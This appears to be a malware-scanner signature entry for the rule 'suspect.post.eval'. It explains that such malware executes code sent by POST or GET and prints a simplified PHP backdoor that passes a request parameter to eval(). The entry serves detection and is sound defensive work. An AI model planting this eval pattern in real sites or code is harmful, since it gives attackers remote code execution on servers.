False Positive Probability: low to medium Malware of this type allows executing of any code that is sent by POST, GET etc. Simplified example: <?php if(isset($_POST['xyz'])) { /* some code */ eval($_POST['xyz']); } ?> {ISPP}suspect.post.eval